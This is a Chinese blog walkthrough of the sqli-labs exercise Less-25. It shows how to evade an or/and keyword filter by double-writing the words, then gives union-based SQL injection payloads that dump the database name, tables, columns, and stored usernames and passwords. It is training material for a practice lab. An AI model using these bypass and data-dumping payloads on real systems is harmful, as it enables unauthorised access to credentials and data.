zoukankan      html  css  js  c++  java
  • Less(25)Trick with OR & AND (过滤了or和and)

    1.OR&AND欺骗

      (1)测试一下

        ?id=1' #

        

         ?id=1' --+

        

       看到id周围是单引号,但是第二种没有报错,可以注入

        

         看一下php,发现会把or 和and 转义成空格

    2.--+绕过,双写or和and

      (1)爆库:?id=-1'  union select 1,2,database()--+

        

      (2)爆表:?id=-1' union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema="security" --+

        

      (3)爆列名:?id=-1' union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_name="users" --+

        

      (4)爆值:

        ?id=-1' union select 1,2,group_concat(passwoorrd)from security.users --+

        

         ?id=-1' union select 1,2,group_concat(username)from security.users --+

        

                

  • 相关阅读:
    C++ sort()函数的用法
    对C++里面 的知识积累:
    codevs 1160
    hdu 1020 Encoding
    poj 2591 Set Definition
    hdu 1505,1506
    hdu 1284 钱币兑换
    hdu 1231 最大连续子序列 ,1003 Max Sum;
    尺取法
    android OTA package packing and extract to partition
  • 原文地址:https://www.cnblogs.com/meng-yu37/p/12310862.html
Copyright © 2011-2022 走看看